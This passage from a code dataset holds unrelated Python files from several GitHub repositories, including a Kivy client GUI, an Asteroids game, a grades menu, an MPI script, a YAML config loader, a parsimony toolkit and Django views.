'size_hint_y': 0.8, 'markup': True}} ]}\n\n\t\ttdata = App.get_running_app().model.getTasksListOfDict()\n\n\t\titem_strings = [\"{0}\".format(index) for index in range(len(tdata))]\n\n\t\ttasks_dict_adapter = DictAdapter(\n\t\t\tsorted_keys=item_strings,\n\t\t\tdata=tdata,\n\t\t\targs_converter = task_args_converter,\n\t\t\tselection_mode='multiple',\n\t\t\tcls=CompositeListItem)\n\n\t\treturn tasks_dict_adapter\n\t\t\n\n\tdef close(self):\n\t\tsys.exit(0)\n\t\t\n\n\tdef connect(self, ip):\n\t\tself.connectpopup = Popup(title='Connecting', size_hint=(None, None), height=60, width=350, auto_dismiss=True)\n\t\tLogger.info('SOCKET: Connecting to '+ip)\n\t\tself.controller.SERVERIP = ip\n\t\tself.connectpopup.open()\n\t\tself.controller.communication.connectToServer()\n\n\t\tself.screenManager.current = 'tasks_selection'\n\n\n\tdef switchToTab(self, name):\n\t\tif self.tabbed_Panel.current_tab.text != name:\n\t\t\tif name == \"Connect\":\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Connect)\n\t\t\telif name == \"Tasks\":\n\t\t\t\tself.listOfTask.adapter = self.getAdapter()\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Tasks)\n\t\t\telif name == \"Results\":\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Results)\n\t\t\telse:\n\t\t\t\tLogger.error('switchToTab: Invalid PanelHeader name received: '+name)\n\n\n\tdef executeTasks(self):\n\t\tif self.controller.STATE == \"IDLE\":\n\t\t\tselected_task_list = []\n\n\t\t\tfor i in self.listOfTask.adapter.selection:\n\t\t\t\tselected_task_list.append(i.text)\n\n\t\t\tif len(selected_task_list) != 0:\n\t\t\t\tself.controller.STATE = \"RUNNING\"\n\t\t\t\tself.controller.sendTasksToServer(selected_task_list)\n\t\t\t\tself.progressbar_ExecutingScreen.max = len(selected_task_list)\n\t\t\t\tself.screenManager.current = self.screenManager.next()\n\t\t\telse:\n\t\t\t\tp=NoTaskSelectedDialog()\n\t\t\t\tp.open()\n\n\n\tdef getResults(self):\n\t\ttemp_text=\"\"\n\n\t\tfor value in self.controller.getResults().itervalues():\n\t\t\ttemp_text+=(value['name']+\n'''\n-------------------------------------------\n\n\n**Result:**\n\n\n::\n\n'''+value['result']+\n'''\n\n''')\n\t\t\tif value['image'] != None:\n\t\t\t\ttemp_text+=(\n'''\n\n\n**System load during the task:**\n\n\n.. image:: '''+value['image']+'''\n\n''')\n\n\t\tself.rst_result.text= temp_text\n\n\t\tself.screenManager.current = 'tasks_selection'\n\t\tself.switchToTab(\"Results\")\n\n\n\n\tdef setConnectionStatus(self,connected):\n\t\tif connected:\n\t\t\tself.label_Connected.text = \"Status: [color=#00ff00][b]Connected[/b][/color]\"\n\t\telse:\n\t\t\tself.label_Connected.text = \"Status: [color=#ff0000][b]Disconnected[/b][/color]\"\n\n\n\tdef updateExecutionStatus(self, task):\n\t\tif task != None:\n\t\t\tself.textinput_Log.text = ''\n\t\t\ttemptext = \"[size=24][color=#36acd8][b]Current Task[b]: [/size][/color][size=18]\"+str(task.NAME)+\"[/size]\\n\"\n\t\t\ttemptext +=\"[size=24][color=#36acd8][b]Description[b]: [/size][/color][size=18]\\n\"+str(task.DESCRIPTION)+\"[/size]\"\n\t\t\tself.label_RunningTask.text = temptext\n\n\n\tdef updateProgressBar(self, percent):\n\t\tself.progressbar_ExecutingScreen.value=percent\n\n\n\tdef goBackButtonHandler(self):\n\t\tself.controller.STATE= \"IDLE\"\n\t\tself.switchToTab(\"Tasks\")\n\n\n\tdef sendToLog(self, message):\n\t\tself.textinput_Log.text += message+\"\\n\"\n\n\n","repo_name":"Spe3do/benchmark","sub_path":"src/client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23029074475","text":"# implementation of Spaceship - program template for RiceRocks\n# http://www.codeskulptor.org/#user40_iCOPDwS7m5mL8M0.py\nimport simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nscore = 0\nlives = 3\ntime = 0\nstarted = False\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\n# .ogg versions of sounds are also available, just replace .mp3 by .ogg\nsoundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p, q):\n return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)\n\n\n# Ship class\nclass Ship:\n\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0], pos[1]]\n self.vel = [vel[0], vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def draw(self,canvas):\n if self.thrust:\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0], self.image_center[1]] , self.image_size,\n self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n # canvas.draw_circle(self.pos, self.radius, 1, \"White\", \"White\")\n\n def update(self):\n # update angle\n self.angle += self.angle_vel\n \n # update position\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\n\n # update velocity\n if self.thrust:\n acc = angle_to_vector(self.angle)\n self.vel[0] += acc[0] * .1\n self.vel[1] += acc[1] * .1\n \n self.vel[0] *= .98\n self.vel[1] *= .98\n\n def set_thrust(self, on):\n self.thrust = on\n if on:\n ship_thrust_sound.rewind()\n ship_thrust_sound.play()\n else:\n ship_thrust_sound.pause()\n \n def increment_angle_vel(self):\n self.angle_vel += .06\n \n def decrement_angle_vel(self):\n self.angle_vel -= .06\n \n def shoot(self):\n global missile_group\n forward = angle_to_vector(self.angle)\n missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]\n missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]\n a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\n missile_group.add(a_missile)\n \n def get_radius(self):\n return self.radius\n \n def get_position(self):\n return self.pos\n \n \n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def draw(self, canvas):\n if self.animated:\n canvas.draw_image(self.image, [self.image_center[0] + self.age * self.image_size[0], self.image_center[1]], self.image_size,\n self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle) \n\n def update(self):\n # update angle\n self.angle += self.angle_vel\n \n # update position\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\n \n # check age\n self.age += 1\n if self.age < self.lifespan:\n return False\n return True\n \n def get_radius(self):\n return self.radius\n \n def get_position(self):\n return self.pos\n \n def collide(self, other_object):\n dist = math.pow((self.get_position()[0] - other_object.get_position()[0]), 2) + math.pow((self.get_position()[1] - other_object.get_position()[1]), 2)\n dist = math.pow(dist, 0.5)\n if self.get_radius() + other_object.get_radius() > dist:\n return True\n return False\n \n \n# key handlers to control ship \ndef keydown(key):\n if not started:\n return\n if key == simplegui.KEY_MAP['left']:\n my_ship.decrement_angle_vel()\n elif key == simplegui.KEY_MAP['right']:\n my_ship.increment_angle_vel()\n elif key == simplegui.KEY_MAP['up']:\n my_ship.set_thrust(True)\n elif key == simplegui.KEY_MAP['space']:\n my_ship.shoot()\n \ndef keyup(key):\n if not started:\n return\n if key == simplegui.KEY_MAP['left']:\n my_ship.increment_angle_vel()\n elif key == simplegui.KEY_MAP['right']:\n my_ship.decrement_angle_vel()\n elif key == simplegui.KEY_MAP['up']:\n my_ship.set_thrust(False)\n \n# mouseclick handlers that reset UI and conditions whether splash image is drawn\ndef click(pos):\n global started, score, lives\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = 3\n score = 0\n soundtrack.rewind()\n\ndef draw(canvas):\n global time, started, rock_group, lives, missile_group, score, my_ship\n \n # animate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw UI\n canvas.draw_text(\"Lives\", [50, 50], 22, \"White\")\n canvas.draw_text(\"Score\", [680, 50], 22, \"White\")\n canvas.draw_text(str(lives), [50, 80], 22, \"White\")\n canvas.draw_text(str(score), [680, 80], 22, \"White\")\n\n # draw ship and sprites\n my_ship.draw(canvas)\n if started:\n process_sprite_group(canvas, rock_group)\n process_sprite_group(canvas, missile_group)\n process_sprite_group(canvas, explosion_group) \n soundtrack.play()\n \n # update ship and sprites\n my_ship.update()\n\n # draw splash screen if not started\n if not started:\n canvas.draw_image(splash_image, splash_info.get_center(), \n splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n splash_info.get_size())\n \n # check for collision & decrease lives\n if group_collide(rock_group, my_ship):\n lives -= 1\n \n # check for missile and rocks collision and update score\n score += group_group_collide(rock_group, missile_group)\n \n if lives <= 0:\n started = False\n soundtrack.pause()\n my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\n my_ship.set_thrust(False)\n for element in set(rock_group):\n rock_group.remove(element)\n for element in set(explosion_group):\n explosion_group.remove(element)\n for element in set(missile_group):\n missile_group.remove(element)\n \n \n# method to draw rocks and missiles in a set\ndef process_sprite_group(canvas, group):\n for element in set(group):\n element.draw(canvas)\n if element.update():\n group.discard(element)\n\n# group collide detection\ndef group_collide(group, other_object):\n global explosion_group\n for element in set(group):\n if element.collide(other_object):\n explosion_pos = element.get_position()\n explosion_vel = [0, 0]\n explosion_avel = 0\n explosion = Sprite(explosion_pos, explosion_vel, 0, explosion_avel, explosion_image, explosion_info)\n explosion_group.add(explosion)\n explosion_sound.play()\n group.remove(element)\n return True\n return False\n\n# collision between missiles and rocks\ndef group_group_collide(group, other_group):\n count = 0\n for element in set(group):\n if group_collide(other_group, element):\n group.discard(element)\n count += 1\n return count\n \n# timer handler that spawns a rock \ndef rock_spawner():\n global rock_group, started, my_ship, score\n rock_pos = [random.randrange(0, WIDTH), random.randrange(0, HEIGHT)]\n rock_vel = [random.random() * .6 - .3 + score / 40, random.random() * .6 - .3 + score / 40]\n rock_avel = random.random() * .2 - .1\n a_rock = Sprite(rock_pos, rock_vel, 0, rock_avel, asteroid_image, asteroid_info) \n dist = math.pow((a_rock.get_position()[0] - my_ship.get_position()[0]), 2) + math.pow((my_ship.get_position()[1] - my_ship.get_position()[1]), 2)\n dist = math.pow(dist, 0.5)\n if len(rock_group) < 13 and started and dist > 70:\n rock_group.add(a_rock)\n \n# initialize stuff\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and two sprites\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\nrock_group = set()\nmissile_group = set()\nexplosion_group = set()\n\n\n# register handlers\nframe.set_keyup_handler(keyup)\nframe.set_keydown_handler(keydown)\nframe.set_mouseclick_handler(click)\nframe.set_draw_handler(draw)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\n\n# get things rolling\ntimer.start()\nframe.start()\n","repo_name":"rajeshsurana/PythonPortfolio","sub_path":"Asteroids/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"31456126347","text":"class MenuClass:\n def menu(self,language,choose=None):\n from discipleClass import DiscipleClass\n from menuClass import MenuClass\n if (language == 'PL'):\n print('Czesc, zalogowales sie do dziennika. Wybierz opcje, poprzez wpisanie jej numeru:')\n print('0. Wybierz i wyswietl ucznia, z obliczona srednia ocen(statystyki).')\n print('1. Dodanie ucznia.')\n print('2. Edycja ucznia.')\n print('3. Usuniecie ucznia.')\n print('4. Importuj baze danych z pliku csv')\n print('5. Eksortuj baze danych do pliku csv')\n print('6. Wyloguj sie.')\n print('7. Zrob kopie bazy danych z pliku csv(dataCopy.csv).')\n if (choose == None):\n choose = str(input())\n if (choose == \"0\"):\n DiscipleClass().chooseAndDisplayDisciple(language)\n elif (choose == \"1\"):\n DiscipleClass().addDisciple(language)\n elif (choose == \"2\"):\n DiscipleClass().editDisciple(language)\n elif (choose == \"3\"):\n DiscipleClass().removeDisciple(language)\n elif (choose == \"4\"):\n MenuClass().importDatabaseFromCSV(language)\n elif (choose == \"5\"):\n MenuClass().exportDatabaseToCSV(language)\n elif (choose == \"6\"):\n MenuClass().logOut(language)\n elif (choose == \"7\"):\n MenuClass().copyDatabaseToCSV(language)\n else:\n print('You had a typo. Try again!')\n return MenuClass().menu(language)\n elif (language == 'EN'):\n print('Hello, you logged in electronic dictionary. Choose option, by typing in it\\'s number:')\n print('0. Choose and show disciple, with mark averages(statistics)')\n print('1. Add disciple')\n print('2. Edit disciple')\n print('3. Delete disciple')\n print('4. Import database from csv file')\n print('5. Export database to csv file')\n print('6. Log Out')\n print('7. Make a copy of database(dataCopy.csv).')\n if(choose==None):\n choose = str(input())\n if (choose == \"0\"):\n DiscipleClass().chooseAndDisplayDisciple(language)\n elif (choose == \"1\"):\n DiscipleClass().addDisciple(language)\n elif (choose == \"2\"):\n DiscipleClass().editDisciple(language)\n elif (choose == \"3\"):\n DiscipleClass().removeDisciple(language)\n elif (choose == \"4\"):\n MenuClass().importDatabaseFromCSV(language)\n elif (choose == \"5\"):\n MenuClass().exportDatabaseToCSV(language)\n elif (choose == \"6\"):\n MenuClass().logOut(language)\n elif (choose == \"7\"):\n MenuClass().copyDatabaseToCSV(language)\n else:\n print('You had a typo. Try again!')\n return MenuClass().menu(language)\n\n def chooseLanguage(self,choose=None):\n if (choose == None):\n print('To choose english language, type in: EN')\n print('Zeby wybrac polski jezyk, wpisz: PL')\n choose = str(input())\n if(choose!=\"EN\" and choose!=\"PL\"):\n raise Exception(\"Wrong language inputed.\")\n return choose\n def exportDatabaseToCSV(self,language):\n from menuClass import MenuClass\n import json\n try:\n with open('../data/data.txt') as json_file:\n data = json.load(json_file)\n with open('../data/data.csv', 'w') as outfile:\n json.dump(data, outfile)\n except:\n pass\n return MenuClass().menu(language)\n def copyDatabaseToCSV(self,language):\n from menuClass import MenuClass\n import json\n try:\n with open('../data/data.csv') as json_file:\n data = json.load(json_file)\n with open('../data/dataCopy.csv', 'w') as outfile:\n json.dump(data, outfile)\n except:\n pass\n return MenuClass().menu(language)\n def importDatabaseFromCSV(self,language):\n from menuClass import MenuClass\n import json\n try:\n with open('../data/data.csv') as json_file:\n data = json.load(json_file)\n with open('../data/data.txt', 'w') as outfile:\n json.dump(data, outfile)\n except:\n pass\n return MenuClass().menu(self,language)\n def logOut(self,language):\n if(language==\"PL\"):\n print(\"Wylogowales sie!\")\n if(language==\"EN\"):\n print(\"You have logged out!\")\n return 0\n#import doctest\n#doctest.testmod(extraglobs={'c': MenuClass()})","repo_name":"TestowanieAutomatyczneUG/projekt-i-Darkstaron123","sub_path":"src/menuClass.py","file_name":"menuClass.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35379636604","text":"#!/usr/bin/env python\nfrom mpi4py import MPI\nimport sys\nimport numpy\n\nworld_size = MPI.COMM_WORLD.Get_size()\nworld_rank = MPI.COMM_WORLD.Get_rank()\n\ncurrent_source = 0\ndest = 0\nglobal_sum = 0\nrank_count = 0\ncomm = MPI.COMM_WORLD\nsums = numpy.zeros((world_size))\n\nprint(sums)\n\nfor rank_count in range(world_size):\n current_source = world_rank\n comm.send(world_rank, dest=dest, tag=0)\n sums[world_rank] = comm.recv(source=0, tag=0)\n rank_count = rank_count + 1\n\nwhile rank_count != world_size:\n received_value = comm.recv(source=current_source, tag=0)\n global_sum = global_sum + received_value\n print(global_sum)\n","repo_name":"otmanesabir/JUB-S4-S5","sub_path":"S5/Parallel & Distributed Computing/Lecture1:MPI/global_sum.py","file_name":"global_sum.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"31106740895","text":"import sys\nfrom typing import Type, TypeVar\nimport yaml\nfrom paramsparser.paramsbase import ParamsBase\n\nT = TypeVar('T')\n\nclass Yaml2Params(ParamsBase):\n def __init__(self, filename:str='params.yml', filestream=None, safe_load=True, params:dict=None) -> None:\n if params is None:\n params = Yaml2Params.load_document(filename, filestream, safe_load, False)\n super().__init__(params)\n self._configs.filename = filename\n\n def save(self, new_filename=None, overwrite=True):\n super().save(new_filename, yaml.dump(dict(self)), overwrite)\n\n add_representer = yaml.add_representer\n add_constructor = yaml.add_constructor\n @staticmethod\n def register_class(class_name: Type[T], ytag: str) -> None:\n suffix = '%s.%s' % (class_name.__module__, class_name.__name__)\n Yaml2Params.add_representer(class_name, lambda dumper, obj: dumper.represent_mapping(ytag, obj.__dict__))\n Yaml2Params.add_constructor(ytag, lambda loader, node: loader.construct_python_object(suffix, node))\n\n @staticmethod\n def load_all_documents(filename:str='params.yml', filestream=None, safe_load=True):\n return [Yaml2Params(params=d) for d in Yaml2Params.load_document(filename, filestream, safe_load, True)]\n\n @staticmethod\n def load_document(filename, filestream=None, safe_load=True, load_multiple=False):\n try:\n load_type = 'load'\n if load_multiple:\n load_type += '_all'\n load_function = getattr(yaml, 'safe_' + load_type) if safe_load else getattr(yaml, load_type)\n if filestream is not None:\n data = load_function(filestream)\n else:\n with open(filename, 'r', encoding='utf-8') as filestream:\n data = load_function(filestream)\n for d in (data if load_multiple else [data]):\n if not isinstance(d, dict):\n raise TypeError(f'TypeError: key is missing in {d}')\n return data\n except TypeError as e:\n print('Exception occurred while parsing YAML...', file=sys.stderr)\n print(e, file=sys.stderr)\n sys.exit(1)\n except Exception as e:\n print('Exception occurred while loading YAML...', file=sys.stderr)\n print(e, file=sys.stderr)\n sys.exit(1)\n\n","repo_name":"pysan3/paramsparser","sub_path":"paramsparser/yaml2params.py","file_name":"yaml2params.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31986298344","text":"import numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nimport resize_images\n\ndef convert_arrays(data, labels):\n values = np.array(labels)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n del_these = np.where(integer_encoded == 0)\n integer_encoded = np.delete(integer_encoded, del_these)\n data = np.delete(data, del_these)\n data = resize_images.resize_array(data)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n labels = onehot_encoder.fit_transform(integer_encoded)\n # reshape X data\n data = data.transpose().reshape(-1, 50 * 50)\n data = data.transpose().reshape(-1, 50 * 50)\n data = np.true_divide(data, 255)\n return data, labels\n","repo_name":"alexfaus08/Recognizing-Scrabble-Letters","sub_path":"convert_arrays.py","file_name":"convert_arrays.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30745686490","text":"from typing import List\n\n# Alternative ways of sending required arguments to the application if env variables is not an option for your\n# deployment\n\nDISCORD_TOKEN = None\n\n# Required config parameters to replace\n\n# -- Gameplay balancing related\nUNCOMMON_UPGRADE_RATE: float = None\nDEFAULT_BASIC_BOOSTER_COOLDOWN: int = None\nDEFAULT_PROMO_BOOSTER_COOLDOWN: int = None\nDEFAULT_GRADING_COOLDOWN: int = None\nDAILY_MONEY_GIFT_AMOUNT: int = None\nBOOSTERS_PRICE: dict[str, int] = {\n \"Basic\": None,\n \"Promo\": None\n}\nGRADING_PRICE: int = None\nFAV_GALLERY_PAGES: int = None\n\n# -- Discord related\nLOG_CHANNEL_ID: int = None\nBOT_ADMIN_USER_IDS: List[int] = []\n\n# -- Database related\nDATABASE_MODE_ENABLED: bool = False\nHOSTNAME: str = None\nDB_NAME: str = None\nUSERNAME: str = None\nPASSWORD: str = None\nPORT_ID: int= None\nCONNECTION_POOL_MIN_CONNECTIONS: int = 0\nCONNECTION_POOL_MAX_CONNECTIONS: int = 5\n","repo_name":"Grimmys/PokeTCGBot","sub_path":"config_sample.py","file_name":"config_sample.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"40932998857","text":"''' Toolkit for performance of Parsimonious Criterion (Parsimony) methods of\noptimization of a phylogenetic topology with a particular set of data. '''\n\n# Date: Mar 3 2014\n# Author: Alex Safatli\n# E-mail: safatli@cs.dal.ca\n\nfrom base import treeStructure\npostorder = treeStructure.postOrderTraversal\n\nclass profile_set:\n \n ''' Hold a set of site_profile profiles for an \n entire alignment. '''\n\n def __init__(self,alignment):\n \n ''' Initialize this profile set by indicating an alignment. \n \n :param alignment: an alignment object\n :type alignment: an :class:`.alignment.alignment` object\n \n '''\n \n self.alignment = alignment\n self.numSites = alignment.getSize()\n self.taxa = {}\n self.profiles = []\n self.weights = []\n self.sites = []\n self._constructSet()\n self._buildTaxaDict()\n \n def _constructSet(self):\n \n ''' PRIVATE: Build all site_profiles. '''\n \n num = self.numSites\n for site in xrange(num):\n pro = site_profile(self.alignment,site)\n self.sites.append(pro)\n if pro in self.profiles:\n self.weights[self.profiles.index(pro)] += 1\n else:\n self.profiles.append(pro)\n self.weights.append(1)\n \n def _buildTaxaDict(self):\n \n ''' PRIVATE: Build taxa dictionary. '''\n \n tax = self.alignment.getTaxa()\n for t in xrange(len(tax)): self.taxa[tax[t]] = t\n \n def __len__(self):\n \n return len(self.profiles)\n \n def weight(self,val):\n \n ''' Acquire the weight associated with an index. \n \n :param val: an index of the set\n :type val: an integer\n :return: a weight (integer)\n \n '''\n \n return self.weights[val]\n \n def get(self,val):\n \n ''' Acquire the site profile at an index. \n \n :param val: an index of the set\n :type val: an integer\n :return: a :class:`.site_profile` object\n \n '''\n \n return self.profiles[val]\n \n def getForTaxa(self,val,tax):\n \n ''' Acquire the string of sequence alphabet characters for a taxon. \n \n :param val: an index of the set\n :type val: an integer\n :param tax: a taxon name\n :type tax: a string\n :return: a string of characters\n \n '''\n \n return self.profiles[val].vector[self.taxa[tax]]\n\nclass site_profile:\n \n ''' Consolidate a single column of the alignment into a set of components\n with associated counts. '''\n \n def __init__(self,alignment,site):\n \n ''' Initialize this profile. \n \n :param alignment: an alignment object\n :type alignment: an `.alignment.alignment` object\n :param site: a site/column index along the alignment\n :type site: an integer\n \n '''\n \n self.alignment = alignment\n self.site = site\n self.alphabet = None\n self.vector = ''\n self._buildVector()\n \n def __eq__(self,o):\n \n if (o == None): return False\n return (self.vector == o.vector)\n \n def __ne__(self,o):\n \n return not self.__eq__(o)\n \n def __str__(self):\n \n return self.vector\n \n def _buildVector(self):\n \n ''' Build the vector comprising the set of components. '''\n \n aliData = self.alignment.data\n sitesli = aliData.sequenceSlice(self.site)\n compn = 0\n comps = {}\n for it in sitesli:\n if not it in comps:\n comps[it] = compn\n compn += 1\n self.vector += str(comps[it])\n self.alphabet = comps\n\ndef fitch_cost(topology,profiles):\n \n ''' Calculate the cost using Fitch algorithm on \n profile set and alignment. Deprecated: Python implementation \n of the Fitch algorithm; see fitch C++ module for \n a C++ implementation that is roughly four times faster. '''\n \n # Calculate parsimony score.\n total = 0\n porde = [x for x in postorder(topology.getRoot())]\n for profile in xrange(len(profiles)):\n posdata, local = {}, 0\n for node in porde:\n # If is leaf.\n if (len(node.children) == 0):\n posdata[node] = profiles.getForTaxa(profile,node.label)\n # Not a leaf.\n else:\n a = posdata[node.children[0].child]\n b = posdata[node.children[1].child]\n # Get intersection.\n X = set(a).intersection(set(b))\n # If intersection is nothing...\n if (len(X) == 0):\n # Cost goes up, take union.\n local += 1\n X = set(a).union(set(b))\n posdata[node] = X\n total += local*profiles.weight(profile)\n return total\n\ndef fitch(topology,alignment):\n \n ''' Perform the Fitch algorithm on a given\n tree topology and associated alignment. Deprecated: \n Python implementation of the Fitch algorithm; \n see fitch C++ module for a C++ implementation \n that is roughly four times faster. '''\n \n # Turn alignment sets into profiles.\n profiles = profile_set(alignment)\n if (len(profiles) == 0): return None\n return fitch_cost(topology,profiles)","repo_name":"AlexSafatli/Pylogeny","sub_path":"pylogeny/parsimony.py","file_name":"parsimony.py","file_ext":"py","file_size_in_byte":5539,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"27"} +{"seq_id":"74874347592","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import machine\n\n# Create your views here.\ndef home(request):\n obj = None\n if request.method == \"POST\":\n name = request.POST.get('name')\n dtype = request.POST.get('type')\n print(\"Name = \",name, \"\\nDtype = \", dtype)\n obj = machine.objects.create(name=name, dtype=dtype)\n\n\n machines = machine.objects.all()\n if obj:\n context = {\n \"machines\" : machines,\n \"message\" : {\n \"name\" : obj.name, \n \"dtype\" : obj.dtype\n }\n }\n obj.save()\n else:\n context = {\n \"machines\" : machines\n }\n\n return render(request, 'home.html', context)\n\ndef detail(request, pk):\n try:\n machinedt = machine.objects.get(pk=pk)\n context = {\n \"machine\" : machinedt\n }\n return render(request, 'detail.html', context)\n except:\n return HttpResponse(\"This is not a valid machine ID\")","repo_name":"ksharma20/Challenges","sub_path":"Emvirt/Dj_dash/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"71680938633","text":"from django.db import models\n\n\nclass POC(models.Model):\n result = models.CharField('취약여부', max_length=10, default='Y')\n auto_result = models.CharField('자동판단결과', max_length=10, blank=True, default='')\n vulnerability = models.ForeignKey('Vulnerability', related_name='pocs', 